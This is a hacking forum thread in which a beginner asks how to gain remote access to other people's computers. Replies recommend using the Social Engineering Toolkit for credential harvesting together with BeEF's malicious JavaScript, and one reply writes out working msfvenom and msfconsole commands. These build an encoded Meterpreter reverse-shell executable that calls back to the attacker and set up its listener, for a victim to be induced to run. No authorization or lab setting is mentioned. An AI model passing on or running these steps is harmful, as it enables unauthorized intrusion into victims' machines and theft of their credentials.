Forum Thread: How Should I Start Hacking?

Hey guys this is thirdlion! I have a pretty good knowledge of computers. I have spent a decent amount of time trying to hack an old Windows XP computer with Metasploit. I have followed several how-tos but I have had no success. I am sure there are other hacking methods and tricks then just Metasploit. Could anyone point me to a tutorial?

6 Responses

The point you are missing: To learn hacking, you shouldn't just see how to's. You need to really LEARN, not to decorate what you will do. Learn means have the knowledge to choose which method to do in each situation, and not know only one way, and get broken if it's anything different than the way you learned. I don't know whats your point with 'hacking', i don't know what you want to be or do, so, i can't point you anything, for now.

I would like to know how to gain remote access to a computers and own the box. I have spent a lot of time learning and nothing has worked. I am more then sure there are other ways to do this then just Metasploit. (Thats all that null byte teaches for hacking computers.) It would be helpful if you could give me some suggestions on were to start and what to learn!

Maybe you should try social engineering. It has been fun for me, and can be easier than exploiting sometimes. Look into using the Social Engineering Toolkit and BeeF. BeeF generates an html tag that activates malicious JavaScript, so to start maybe put that tag in a Credential Harvesting site made with SET.

Metasploit works just fine and if you can't "get it work", maybe you should try again.
It's probably the easiest way to exploit windows PC.
You don't need some ultra detailed tutorial on that.

Open a terminal and type :

msfvenom -p windows/meterpreter/reversetcp LHOST=yourip LPORT=443 -e cmd/powershell_base64 -f exe > root/Desktop/anything.exe

New terminal:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST youripagain
set LPORT 443
exploit

Now you need to run anything.exe on windows PC and that's it.

Ill try it thanks!

I agree with ~JESUS, you need to do a lot of research and not just follow HOW-TOs. What about metapsloit, make sure you enable port-forwarding on port 4444 and always put 4444 for LPORT. Hope it helped and try learning a programming language first, it will be easier to "hack" later on if you know programming languages.

Share Your Thoughts

  • Hot
  • Active